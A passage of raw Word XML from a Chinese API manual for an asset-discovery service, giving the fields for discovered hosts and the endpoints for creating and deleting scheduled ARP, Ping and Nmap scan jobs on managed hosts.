        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1847"/>
        <w:gridCol w:w="896"/>
        <w:gridCol w:w="6269"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="5E026EE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DCC9EC1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4DF30F8E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="00A89255" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="526961CE" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1E64FA85" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="22EB8F85" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="41ED9491" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>被发现主机的id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="335B0038" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2FDA0197" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>macAddr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="597BCAF5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7D25EF51" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>被发现主机的mac地址</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="372A6E93" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="45243FAE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ipAddr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1AABE02A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4EC35897" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>被发现主机的</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>地址</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="30D90A77" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="71E0CF72" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>deviceType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="588344A5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3EED4E13" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>被发现主机的设备类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="333C3D4E" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="11734FB9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>osFamily</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0FC6338B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="41B40BFA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>被发现主机的操作系统类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="02503945" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="290897C1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="49B2865A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="60D91039" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>执行发现任务的主机的agent id,16位</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="657B01B0" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5AB1C862" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>discoveryIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="716139E8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="39F7761D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>执行发现任务的主机的</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>地址</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="263E68C0" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3AFC9DE5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentStatus</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="084235AF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F1225BB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>执行发现任务的主机的agent状态 0-在线；1-离线；2挂起；3-删除</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="43CD70A1" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4345644B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>scanMethods</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="58256337" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2D5C2A3F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>发现该主机的扫描方法</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5D678D2D" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3B669DBD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>firstDiscoverTime</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6ABE3FE9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1FA6CF33" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>第一次发现时间，时间戳，精确到秒</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="43A29737" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="689FD348" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>lastDiscoverTime</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="56796C7D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B43D081" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>最近一次发现时间，时间戳，精确到秒</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3E511031" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4F8FF537" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>osType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="60BF2FD2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="219A7A43" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>执行发现任务的主机的操作系统 1-linux；2-windows</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="46E6F5F3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="405" w:name="_Toc115166275"/>
      <w:bookmarkStart w:id="406" w:name="扫描任务"/>
      <w:bookmarkEnd w:id="404"/>
      <w:r>
        <w:t>扫描任务</w:t>
      </w:r>
      <w:bookmarkEnd w:id="405"/>
    </w:p>
    <w:p w14:paraId="2576566D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="407" w:name="_Toc115166276"/>
      <w:bookmarkStart w:id="408" w:name="创建扫描任务"/>
      <w:r>
        <w:t>创建扫描任务</w:t>
      </w:r>
      <w:bookmarkEnd w:id="407"/>
    </w:p>
    <w:p w14:paraId="47DE63B2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A3842C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>assetdiscovery</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/job/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>create</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="51126406" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求参数：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4994246E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "name": "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>assetdiscovery_job_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",    // 自定义扫描任务名</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "kind": 0,    // 任务发起主机类型 0：自定义主机；1：自定义业务组 2：全部主机（注意：只能选择 Linux 的主机作为扫描发起主机，建议选择两台及以上主机扫描整个网段）</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "values": [    // 当kind=0时，</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>valus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>传</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>agentid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>；当kind=1时，</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>valus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>传</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>groupid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"5fcf47bf4891559a",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"5f8e5559b767de2f"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cronExpression</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "0 15 * * *",    // 定时扫描</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cron</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>表达式</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>osDetection</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": true,    // 是否获取操作系统 true/false</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ipList</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": [],           // 扫描网段（选填）</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>advanceConfigs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": [     // 扫描方式设置，以下三种扫描方式至少选择一个</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>scanType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 0    // ARP缓存方式扫描</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        },</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>scanType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 1    // Ping方式扫描</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>scanType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 2,        // Nmap方式扫描，以下两种协议至少选择一个</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tcpPort</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">": "80",      // </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>协议扫描端口</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>udpPort</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "40125"    //</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>udp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>协议扫描端口</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>maxParallelism</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 50,    // 并发扫描最大数量（请填写整数）</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>maxRate</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 50,         // 每秒最大发包数（请填写整数）</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>taskInterval</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 5.0    // 服务器下发任务间隔，不超过600（单位：秒，精确值小数点后一位）</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5346592A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD78BDB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "id": "5fdacbf3edc90d7a292ae9a5"    // 任务id</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041D241C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E"/>
    <w:p w14:paraId="6CFEE796" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="409" w:name="_Toc115166277"/>
      <w:bookmarkStart w:id="410" w:name="删除扫描任务"/>
      <w:bookmarkEnd w:id="408"/>
      <w:r>
        <w:t>删除扫描任务</w:t>
      </w:r>
      <w:bookmarkEnd w:id="409"/>
    </w:p>
    <w:p w14:paraId="0A076626" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E66EA2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>assetdiscovery</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/job/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>delete</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1B2F2AD9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求参数：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B8B932E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>specId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
